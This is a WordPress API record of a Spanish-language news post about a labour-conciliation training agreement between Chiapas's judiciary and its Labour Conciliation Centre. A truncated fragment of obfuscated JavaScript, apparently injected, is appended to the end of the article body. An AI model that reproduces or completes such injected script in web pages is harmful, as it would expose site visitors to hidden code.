{"id":22783,"date":"2025-07-02T03:50:32","date_gmt":"2025-07-02T03:50:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22783"},"modified":"2025-07-02T03:50:32","modified_gmt":"2025-07-02T03:50:32","slug":"poder-judicial-y-centro-de-conciliacion-laboral-de-chiapas-suman-esfuerzos-por-una-cultura-de-paz-en-la-justicia-laboral","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22783","title":{"rendered":"Poder Judicial y Centro de Conciliaci\u00f3n Laboral de Chiapas suman esfuerzos por una cultura de paz en la justicia laboral"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22784\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200282-1024x681.jpg\" alt=\"\" class=\"wp-image-22784\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200282-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200282-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200282-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200282-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200282-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200282-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22785\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200285-1024x681.jpg\" alt=\"\" class=\"wp-image-22785\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200285-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200285-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200285-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200285-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200285-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200285-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22786\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200288-1024x681.jpg\" alt=\"\" class=\"wp-image-22786\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200288-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200288-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200288-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200288-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200288-2048x1362.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200288-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"627\" data-id=\"22787\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200279-1024x627.jpg\" alt=\"\" class=\"wp-image-22787\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200279-1024x627.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200279-300x184.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200279-768x470.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200279-1536x940.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000200279-2048x1254.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>1 de julio del 2025. Tuxtla Guti\u00e9rrez.- Con el objetivo de fortalecer los Mecanismos Alternativos de Soluci\u00f3n de Conflictos en el \u00e1mbito laboral, el Poder Judicial del Estado y el Centro de Conciliaci\u00f3n Laboral del Estado de Chiapas firmaron un Convenio Marco de Colaboraci\u00f3n para la capacitaci\u00f3n, formaci\u00f3n, actualizaci\u00f3n, acreditaci\u00f3n, evaluaci\u00f3n y certificaci\u00f3n en materia de Justicia Alternativa.<\/p>\n\n\n\n<p>En un evento encabezado por el magistrado presidente del Tribunal Superior de Justicia y Consejo de la Judicatura del Estado, Juan Carlos Moreno Guill\u00e9n, junto a la directora general del Centro de Conciliaci\u00f3n Laboral, Sandra Edith Guti\u00e9rrez Ochoa, se sign\u00f3 el acuerdo por el que se robustece el trabajo de conciliaci\u00f3n a trav\u00e9s de la capacitaci\u00f3n, como instancia previa y obligatoria antes de acudir a los tribunales para los casos de controversia laboral.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, el magistrado presidente Moreno Guill\u00e9n destac\u00f3 que este convenio une la experiencia y compromiso de ambas instituciones, por lo que se lograr\u00e1 un trabajo coordinado efectivo, que va a perfeccionar el servicio y, sobre todo, a generar resultados positivos en materia de conciliaci\u00f3n laboral, al tiempo de fomentar la cultura del di\u00e1logo en todos los \u00e1mbitos de la vida, beneficiando a la poblaci\u00f3n chiapaneca.<\/p>\n\n\n\n<p>Por su parte, la directora general del Centro de Conciliaci\u00f3n Laboral, Sandra Edith Guti\u00e9rrez Ochoa, agradeci\u00f3 la apertura institucional del Poder Judicial y del magistrado presidente para trabajar en conjunto por una justicia laboral m\u00e1s humana, accesible y cercana; y refrend\u00f3 su voluntad para profesionalizar a las servidoras y servidores del Centro de Conciliaci\u00f3n, con la calidad y calidez que deben proyectar en su quehacer diario con las y los justiciables.<\/p>\n\n\n\n<p>Con esta colaboraci\u00f3n, el Poder Judicial del Estado de Chiapas reafirma su visi\u00f3n humanista y su compromiso con la capacitaci\u00f3n y el trabajo interinstitucional, que pondera la cultura de la conciliaci\u00f3n como el camino hacia la paz.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 1 de julio del 2025. Tuxtla Guti\u00e9rrez.- Con el objetivo de fortalecer los Mecanismos Alternativos de Soluci\u00f3n de Conflictos en el \u00e1mbito laboral, el Poder Judicial del Estado y el Centro de Conciliaci\u00f3n Laboral del Estado de Chiapas firmaron un Convenio Marco de Colaboraci\u00f3n para la capacitaci\u00f3n, formaci\u00f3n, actualizaci\u00f3n, acreditaci\u00f3n, evaluaci\u00f3n y certificaci\u00f3n en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22784,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22783","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22783","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22783"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22783\/revisions"}],"predecessor-version":[{"id":22788,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22783\/revisions\/22788"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22784"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}